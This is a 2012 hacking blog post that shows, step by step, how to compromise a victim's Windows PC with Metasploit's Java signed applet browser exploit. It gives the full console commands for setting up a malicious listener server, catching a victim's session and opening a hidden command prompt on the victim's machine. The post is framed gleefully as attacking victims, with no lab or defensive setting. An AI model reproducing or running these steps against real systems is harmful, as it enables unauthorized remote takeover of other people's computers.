Our Feeds

Saturday 13 October 2012

AJITH KP

Java Signed Applet Remote Code Execution with Metasploit

This is the new threat in cyber world. [Metasploit]

It enables Hacker to execute commands in victims computer.

Here I have made a tutorial to hack PC using this vulnerability.

You need tho install the module. I'm not going to describe how to install module.

Open Metasploit Console.

Input command,

>use exploit/multi/browser/java_signed_applet


First step over, now you need to set up malicious server in your PC

Find you IP address as first step to set up malicious server.

Open Command Prompt and execute command ipconfig 
[For Linux User ifconfig]



Next execute a series of commands in Metasploit Console.

>set LHOST 117.230.54.146
>set LPORT 560
>set URIPATH ajithkp560
>set TARGET 0
>exploit -j

Yes We have set up Malicious Server  at http://117.230.54.146:8080/ajithkp560 :)


Yeah now Metasploit have started to seek the victim for connect.

This Image is taken by me without using the command set URI ajithkp560

Yes Victim will connect if he run the Bytecode Verifier. :p

Yes we have done....



>sessions -i 1

This command is for connect to First Victim who connected to your malicious server.
Now we have connected to first victim :p


Yo... Baby we have connected to our victim.

Next command is for access the Command Prompt of victim :p

>execute -H -i -f "cmd"

Yo... Yo... pWned Command Prompt of victim :p


Now I'm going to Change Directory to E:\

>e:\
>dir

Guyz I have spend my 1 hour to create this tutorial and pWn victim. So please spend your 10 seconds to write your comments...

2 comments

Write comments
Ajith KP
AUTHOR
14 October 2012 at 01:05 delete

Please write your comments about Hacking remote pc by java applet verifier remote code execution using metasploit. Thanks for reading.

Reply
avatar
Anonymous
AUTHOR
17 October 2012 at 09:04 delete

will you help me to study some trick on metaslpoit

Reply
avatar